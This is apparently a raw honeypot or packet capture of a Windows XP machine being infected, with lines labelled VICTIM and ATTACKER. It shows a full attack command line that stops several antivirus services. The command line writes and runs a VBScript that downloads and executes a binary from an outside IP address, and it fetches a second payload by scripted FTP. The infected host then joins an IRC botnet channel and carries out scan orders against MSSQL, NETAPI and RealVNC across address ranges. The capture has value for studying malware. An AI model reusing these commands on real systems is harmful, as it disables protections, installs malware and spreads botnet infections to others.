VICTIM: Microsoft Windows XP [Version 5.1.2600]
VICTIM: (C) Copyright 1985-2001 Microsoft Corp.C:\\WINDOWS\\system32>
ATTACKER: net stop \Norton AntiVirus Auto Protect Service\&net stop Mcshield&net stop \Panda Antivirus\&echo dim HTTPGET>c:\\1.vbs&echo dim Data>>c:\\1.vbs&echo dim ExeURL>>c:\\1.vbs&echo dim LocalPath>>c:\\1.vbs&echo.>>c:\\1.vbs&echo ExeURL = \http:/58.236.112.187:23369/84785_msvcpr.exe\>>c:\\1.vbs&echo LocalPath = \c:\\prsc32.exe\>>c:\\1.vbs&echo.>>c:\\1.vbs&echo Set HTTPGET = CreateObject(\Microsoft\ ^& chr(46) ^& \XMLHTTP\)>>c:\\1.vbs&echo Set Data = CreateObject(\ADODB\ ^& chr(46) ^& \Stream\)>>c:\\1.vbs&echo.>>c:\\1.vbs&echo HTTPGET.Open \GET\, ExeURL, false>>c:\\1.vbs&echo HTTPGET.Send>>c:\\1.vbs&echo.>>c:\\1.vbs&echo Const adTypeBinary = ^1>>c:\\1.vbs&echo Const adSaveCreateOverWrite = ^2>>c:\\1.vbs&echo.>>c:\\1.vbs&echo Data.Type = adTypeBinary>>c:\\1.vbs&echo Data.Open>>c:\\1.vbs&echo Data.Write HTTPGET.ResponseBody>>c:\\1.vbs&echo Data.SaveToFile LocalPath, adSaveCreateOverWrite>>c:\\1.vbs&cscript /Nologo /B c:\\1.vbs&del c:\\1.vbs&start c:\\prsc32.exe&echo OPEN 58.236.112.187 20152>x&echo GET 27031_msvcpr.exe>>x&echo QUIT>>x&FTP -n -s:x&27031_msvcpr.exe&del x&exit
VICTIM: GET /84785_msvcpr.exe HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: 58.236.112.187:23369Connection: Keep-Alive
VICTIM: PORT 192,168,1,1,4,11
ATTACKER: RETR 27031_msvcpr.exe
VICTIM: NICK [0]USA|XP-SP0[P]578765
ATTACKER: :Vancouver.BC.CA.Undernet.org NOTICE AUTH :*** Looking up your hostname...
VICTIM: USER Gangsta \localhost\ \ice.novi-pazar.biz\ :Shit
ATTACKER: :Vancouver.BC.CA.Undernet.org NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
ATTACKER: :Vancouver.BC.CA.Undernet.org 001 [0]USA|XP-SP0[P]578765 :Welcome to the ROXnet IRC Network [0]USA|XP-SP0[P]578765!Gangsta@192.168.1.1:Vancouver.BC.CA.Undernet.org 002 [0]USA|XP-SP0[P]578765 :Your host is Vancouver.BC.CA.Undernet.org, running version Unreal3.2-RC2fix:Vancouver.BC.CA.Undernet.org 003 [0]USA|XP-SP0[P]578765 :This server was created Thu Jan 10 2008 at 04:01:05 CST:Vancouver.BC.CA.Undernet.org 004 [0]USA|XP-SP0[P]578765 Vancouver.BC.CA.Undernet.org Unreal3.2-RC2fix iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzNT:Vancouver.BC.CA.Undernet.org 005 [0]USA|XP-SP0[P]578765 MAP KNOCK SAFELIST HCN MAXCHANNELS=10 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=20 AWAYLEN=307 :are supported by this server:Vancouver.BC.CA.Undernet.org 005 [0]USA|XP-SP0[P]578765 WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beqa,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server:Vancouver.BC.CA.Undernet.org 422 [0]USA|XP-SP0[P]578765 :MOTD File is missing:[0]USA|XP-SP0[P]578765 MODE [0]USA|XP-SP0[P]578765 :+iw
VICTIM: JOIN #pest#
VICTIM: JOIN #pest#JOIN #pest#
ATTACKER: :[0]USA|XP-SP0[P]578765!Gangsta@192.168.1.1 JOIN :#pest#:Vancouver.BC.CA.Undernet.org 332 [0]USA|XP-SP0[P]578765 #pest# :scan -m -n -v -r:Vancouver.BC.CA.Undernet.org 333 [0]USA|XP-SP0[P]578765 #pest# i 1215680721:Vancouver.BC.CA.Undernet.org 353 [0]USA|XP-SP0[P]578765 @ #pest# :[0]USA|XP-SP0[P]578765 @dk :Vancouver.BC.CA.Undernet.org 366 [0]USA|XP-SP0[P]578765 #pest# :End of /NAMES list.
VICTIM: PRIVMSG #pest# :{SCAN}: Scanning (#MSSQL#NETAPI#REALVNC#) 10.2.*.*
ATTACKER: :Vancouver.BC.CA.Undernet.org 404 [0]USA|XP-SP0[P]578765 #pest# :You must have a registered nick (+r) to talk on this channel (#pest#)
VICTIM: QUIT
ATTACKER: :dk!dR@dR.com PRIVMSG #pest# :scan 83.117.x -m -n -v -r
VICTIM: PRIVMSG #pest# :{SCAN}: Scanning (#MSSQL#NETAPI#REALVNC#) 83.117.*.*
ATTACKER: :Vancouver.BC.CA.Undernet.org 404 [0]USA|XP-SP0[P]578765 #pest# :You must have a registered nick (+r) to talk on this channel (#pest#)